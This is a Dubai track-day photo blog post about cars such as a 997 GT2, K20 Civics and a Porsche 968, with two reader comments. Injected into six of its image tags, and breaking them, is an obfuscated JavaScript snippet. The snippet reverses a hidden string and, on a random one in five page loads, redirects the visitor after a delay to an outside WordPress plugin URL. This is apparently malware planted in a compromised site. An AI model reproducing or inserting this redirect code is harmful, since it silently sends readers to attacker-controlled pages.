Part 2 – So after a super hot and very humid evening taking shots at Rd5 of the Sprints last night, then spending today tied up and unable to finish editing the shots I grabbed, I thought Part 2 of the track evening collection deserved a showing.

I personally love track days and feel that if the Dubai Autodrome mixed the free open pit lane aspect of the track evenings with the competition provided by the against the clock sprint evenings, they will have struck gold! US Time Attack style…

A great bunch of guys and a killer collection of cars – A 997GT2 and two very cool hot rod Honda Civics with K20 monsters stuffed in the business end. More to come on these I promise…

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/6th%20August%20Track/IMG_8617.jpg” width=”728″ />

LA Designs doing it again! Based out of Victoria Australia they seem to be popping up all over the place in the UAE – Something tells me that a certain person is responsible for this?!!

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/6th%20August%20Track/IMG_8642.jpg” width=”728″ />

Truly EPIC – Not much more to say about this car…Sadly not running next year due to the rules. I have a nice collection of shots of the RISI car that will be online in the coming days.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/6th%20August%20Track/IMG_8564.jpg” width=”728″ />

Fraser Martin keeping everything ticking along beautifully all evening.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/6th%20August%20Track/IMG_8445.jpg” width=”728″ />

A visit to the track wouldn’t be the same without the ARM (Alex Renner) guys representing somewhere along the line. This time it was Cabells Orange “Squash” and Paul’s Pepermint CS. Sweet couple of cars…

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/6th%20August%20Track/IMG_8465.jpg” width=”728″ />

ARM 968CS – For those that don’t know about the Porsche 968 either read up on them or hang tight for the story that will be coming your way.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/6th%20August%20Track/IMG_8705.jpg” width=”728″ />

Gotta love a gun metal R35 GT-R sneaking out for some hot laps.

  1. Shadow – Unfortunately the Ferrari doesn’t like the heat because it doesn’t have any radiator fans. The only way to cool the engine is the air going through it which is hard to do when the ambient air temp is 40 degrees! It is the same with our GT3 Cup Car. Further, the Club Circuit is kind of a joke for that car, it likes to stretch its legs a little more…

    The Orange RS is a converted street car which is why it doesn’t overheat as much and can do a full session.

    As an FYI, the 968 is now an official Khaleji car as we bought it off of Paul and ARM. It won’t be doing any competitive events, only track days, and will soon be Orange-i-fied like our other Porsches.

    Come say ‘hi’ the next time you are out there.

  2. I stumbled in there pretty late, after the sun had gone down.

    Not the biggest turnout but nonetheless some interesting cars on the track.

    Lap 57 Hondas were looking very well sorted and no mechanical problems at all, suggesting that they’re gonna be a real force again next year.

    Some interesting new drivers showing up too – a 2007 S2000, a Mustang and a blue Evo all getting some tips from Mr. Umair Khan of Lap57. Also the GTR (experienceing minor overheating issues) and a gentleman in a 997 having some nice clean laps.

    Ferrari was a real demon but only seemed to manage a few laps at a time…luckily Cabell has that Porsche, which seemed to get a fair workout.

    Wondering if the 968 is heading to the GT Grid next year then? Seems to be prepped that way…

    Always good chatting to Mr. Frasier Martin (who remembered who I am, how flattering) and Ms. Alex.

    Saw a GT3 with orange rims lurking but not venturing onto the track, what a waste 🙂
